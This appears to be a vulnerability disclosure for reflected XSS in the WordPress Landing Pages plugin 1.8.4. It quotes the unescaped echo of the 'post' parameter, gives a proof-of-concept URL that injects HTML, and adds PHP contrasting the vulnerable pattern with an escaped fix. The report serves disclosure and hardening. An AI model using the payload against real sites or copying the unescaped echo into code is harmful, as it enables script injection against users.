Plugin: https://downloads.wordpress.org/plugin/landing-pages.1.8.4.zip
The vulnerable code is in shared/shortcodes/inbound-shortcodes.php, around line 761:
<iframe src='<?php echo INBOUDNOW_SHARED_URLPATH . 'shortcodes/'; ?>preview.php?sc=&post=<?php echo $_GET['post']; ?>' width="285" scrollbar='true' frameborder="0" id="inbound-shortcodes-preview"></iframe>
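As the line above shows, the post parameter received via GET is echoed directly into the HTML (inside the single-quoted src attribute of the iframe) without any escaping, which results in XSS.
The URL that triggers it is as follows: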
http://localhost/wordpress/wp-admin/post-new.php?post_type=inbound-forms&post=%27%3E%3C%2Fiframe%3E%3Ch1%3Exss%40TEST%3C%2Fh1%3E
The result is shown in the screenshot:
<img alt="Clipboard Image.png" src="https://images.seebug.org/contribute/9a4ed6a6-2f1c-4323-81ea-23740e4a652b-Clipboard Image.png"></img>
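
The echo pattern described above next to one way to harden it, as an added example (not the plugin's code and not the vendor's patch). The function names and the $base path are hypothetical; the sample input is the decoded post value from the URL on this page.

```php
<?php
// Added example. render_vulnerable() mirrors the pattern on the page;
// render_hardened() is one possible fix. Names and $base are hypothetical.

function render_vulnerable(string $base, array $get): string
{
    // Raw request value concatenated into a single-quoted attribute.
    return "<iframe src='" . $base . "preview.php?sc=&post=" . ($get['post'] ?? '')
         . "' id=\"inbound-shortcodes-preview\"></iframe>";
}

function render_hardened(string $base, array $get): string
{
    // A post ID is an integer: validate it as one, fall back to 0 otherwise.
    $post_id = filter_var($get['post'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['default' => 0, 'min_range' => 0]]);

    // Escape the finished URL for the attribute context. ENT_QUOTES matters
    // here because the attribute is delimited by single quotes.
    $src = $base . 'preview.php?sc=&post=' . $post_id;
    return "<iframe src='" . htmlspecialchars($src, ENT_QUOTES, 'UTF-8')
         . "' id=\"inbound-shortcodes-preview\"></iframe>";
}

// Constructed input: URL-decoded value of the post parameter shown above.
$get  = ['post' => "'></iframe><h1>xss@TEST</h1>"];
$base = '/example-plugin-path/shortcodes/'; // placeholder path

$before = render_vulnerable($base, $get);
$after  = render_hardened($base, $get);

echo "vulnerable: $before\n";
echo "hardened:   $after\n";

// The injected markup must appear in the first output and not in the second.
if (strpos($before, '<h1>') === false || strpos($after, '<h1>') !== false) {
    throw new RuntimeException('unexpected rendering');
}

// A legitimate numeric ID passes through unchanged.
echo render_hardened($base, ['post' => '42']), "\n";
```

Inside WordPress itself, the equivalent helpers are absint() for the ID and esc_attr() or esc_url() for the attribute value.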